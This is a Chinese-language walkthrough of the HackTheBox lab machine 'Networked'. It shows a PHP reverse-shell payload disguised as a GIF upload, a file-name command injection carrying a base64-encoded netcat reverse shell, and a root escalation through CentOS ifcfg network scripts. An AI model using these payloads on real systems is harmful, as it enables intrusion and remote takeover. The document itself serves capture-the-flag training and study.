Networked - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/203

• 10.10.10.146

端口扫描

22和80:

➜  ~ nmap -sC -sV 10.10.10.146
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-30 01:56 EST
Warning: 10.10.10.146 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.146
Host is up (0.070s latency).
Not shown: 995 closed ports
PORT      STATE    SERVICE          VERSION
22/tcp    open     ssh              OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp    open     http             Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

80

80就一段文字：

目录扫描

简单的目录扫描，发现backup和uploads：

gobuster dir -u http://10.10.10.146/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/backup (Status: 301)
/cgi-bin/ (Status: 403)
/index.php (Status: 200)
/uploads (Status: 301)

backup

backup里有个tar，是4个php文件：

upload && shell

upload就是文件上传，根据backup里的代码，有后缀名校验和文件头校验只能上传图片，但用的php的finfo_file函数，很容易bypass：

Photo.php里可以看到上传后的文件：

shell.gif

GIF89a;
<?php
system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.10/4445 <&1'");
?>

reverse shell

然后去访问触发reverse shell：

guly

在guly用户目录可以看到有个check_attack.php,查看代码可以看到是uploads目录进行检测处理，里面有明显的命令注入：

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

value就是文件名，我们可控

命令注入

直接Touch有点问题，可以base64编码：

echo "nc -e /bin/bash 10.10.14.10 4446" | base64
bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0NDYK
touch  '; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjEwIDQ0NDYK | base64 -d | sh; b'

guly shell

然后等待触发，得到guly shell：

check_attack.php

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
	$msg='';
  if ($value == 'index.html') {
	continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

user flag

Guly 用户目录得到user.txt:

提权信息

Sudo -l发现changename.sh：

查看代码，就是调用ifcfg，输入几个变量：

• Full Disclosure: Redhat/CentOS root through network-scripts
  https://seclists.org/fulldisclosure/2019/Apr/24

根据这个，变量那里可以直接执行任意命令

changename.sh

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
	echo "interface $var:"
	read x
	while [[ ! $x =~ $regexp ]]; do
		echo "wrong input, try again"
		echo "interface $var:"
		read x
	done
	echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

提权 && root flag

所以就可以直接执行bash，得到root：

参考资料

• Full Disclosure: Redhat/CentOS root through network-scripts
  https://seclists.org/fulldisclosure/2019/Apr/24
• HTB: Networked | 0xdf hacks stuff
  https://0xdf.gitlab.io/2019/11/16/htb-networked.html
• https://www.hackthebox.eu/home/machines/writeup/203
• HackTheBox - Networked - YouTube
  https://www.youtube.com/watch?v=H3t3G70bakM&feature=youtu.be&ab_channel=IppSec